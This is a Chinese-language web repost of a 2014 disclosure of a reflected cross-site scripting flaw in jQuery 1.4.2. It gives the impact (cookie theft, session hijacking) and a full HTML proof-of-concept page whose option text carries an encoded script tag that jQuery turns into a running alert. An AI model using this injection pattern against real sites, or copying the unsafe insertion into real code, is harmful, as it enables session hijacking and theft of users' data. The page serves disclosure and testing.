溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

JQuery 1.4.2 'index.html'跨站腳本漏洞

發(fā)布時間:2020-10-03 14:31:53 來源:網(wǎng)絡(luò) 閱讀:2570 作者:zhpfxl 欄目:web開發(fā)

XSS Reflected JQuery 1.4.2 - Create object option in runtime client-side


影響版本:

    JQuery-1.4.2

危害:

    JQuery 'index.html'不正確過濾用戶提交的輸入,遠(yuǎn)程***者可以利用漏洞構(gòu)建惡意URI,誘使用戶解析,可獲得敏感Cookie,劫持會話或在客戶端上進(jìn)行惡意操作。
 

測試:

啟動nginx,并創(chuàng)建文件jquery-xss-reflected.com.br.html,內(nèi)容為:

<!DOCTYPE html>

<! -- Mauro Risonho de Paula Assumpcao -->

<! -- aka firebits mauro.risonho () gmail com -->

<! -- Exploit jQuery JavaScript Library v1.4.2 -->

<! -- 01.09.2014 18:07:14 SaoPaulo/Brazil                            -->

<! --   _____.__              ___.   .__  __

-->

<! -- _/ ____\__|______   ____\_ |__ |__|/  |_  ______                -->

<! -- \   __\|  \_  __ \_/ __ \| __ \|  \   __\/  ___/                -->

<! -- |  |  |  ||  | \/\  ___/| \_\ \  ||  |  \___ \                 -->

<! -- |__|  |__||__|    \___  |___  /__||__| /____  |                -->

<! --                        \/    \/             \/                 -->

<! -- bits on fire - 1989-2014 - brazil                             -->

<! --                                                                 -->

<! -- * jQuery JavaScript Library v1.4.2                            -->

<! -- * http://jquery.com/                                            -->

<! -- *                                                                -->

<! -- * Copyright 2010, John Resig                                    -->

<! -- * Dual licensed under the MIT or GPL Version 2 licenses.        -->

<! -- * http://jquery.org/license                                    -->

<! -- *                                                                -->

<! -- * Includes Sizzle.js                                            -->

<! -- * http://sizzlejs.com/                                        -->

<! -- * Copyright 2010, The Dojo Foundation

-->

<! -- * Released under the MIT, BSD, and GPL Licenses.                -->

<! -- *                                                                -->

<! -- * Date: Sat Feb 13 22:33:48 2010 -0500                        -->

<! -- */                                                            -->


<html>

<head>

  <meta charset="utf-8">

  <title>XSS Reflected - Jquery 1.4.2 </title>

  <script src="https://code.jquery.com/jquery-1.4.2.js"></script>

  <script>

    $(function() {

      $('#users').each(function() {

        var select = $(this);

        var option = select.children('option').first();

        select.after(option.text());

        select.hide();

      });

    });

  </script>

</head>



<body>

  <form method="post">

    <p>

      <select id="users" name="users">

        <option value="x***eflected">&lt;script&gt;alert(&#x27;x***eflected - jquery 1.4.2 by - 01.09.2014 18:07:14 Sao Paulo/Brazil@firebitsbr - mauro.risonho () gmail com&#x27;);&lt;/script&gt;</option>

      </select>

    </p>

  </form>

</body>

</html>

訪問地址:

http://localhost/jquery-xss-reflected.com.br.html

測試截圖:

JQuery 1.4.2 'index.html'跨站腳本漏洞


相關(guān)連接地址:

http://seclists.org/fulldisclosure/2014/Sep/10

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI